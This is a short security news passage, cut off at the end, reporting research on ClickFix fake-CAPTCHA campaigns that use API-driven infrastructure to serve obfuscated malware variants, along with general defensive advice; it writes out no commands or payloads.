A security researcher analyzed 3,000 live ClickFix payloads and discovered the scam now operates through API-driven infrastructure that delivers customized malware variants to each victim. ClickFix tricks users into manually executing malicious code by displaying fake CAPTCHA verification pages that claim to prove human identity.
The research reveals ClickFix operators control backend servers that distribute identical malware in different obfuscated forms. This API architecture enables rapid distribution of variants tailored to evade detection. Each payload retains the same functionality but arrives wrapped in unique code, complicating signature-based detection across security tools.
Researchers also identified a new delivery mechanism designed to bypass Windows script execution controls. This method exploits how the operating system processes certain script types, allowing malware to run despite built-in protections.
ClickFix campaigns typically begin with phishing links or malicious ads directing users to websites mimicking legitimate browser security warnings or software updates. The pages instruct victims to copy and paste commands into PowerShell or Command Prompt to "fix" detected threats. Users execute the commands without understanding they're installing malware like information stealers, banking trojans, or backdoors.
The API-driven approach represents operational maturity. Rather than manually crafting variants, operators automate the process. The same base malware receives different encoding, encryption, or obfuscation on each delivery. This complicates attribution and forces defenders to analyze numerous samples that behave identically under the surface.
Organizations face persistent risk from ClickFix because it exploits human behavior rather than technical vulnerabilities. Security awareness training reduces exposure, but determined attackers find new obfuscation techniques and delivery angles. The Windows script bypass adds technical depth to what began as a social engineering attack.
Defenders should monitor for suspicious PowerShell or Command Prompt execution, particularly commands copying from external sources
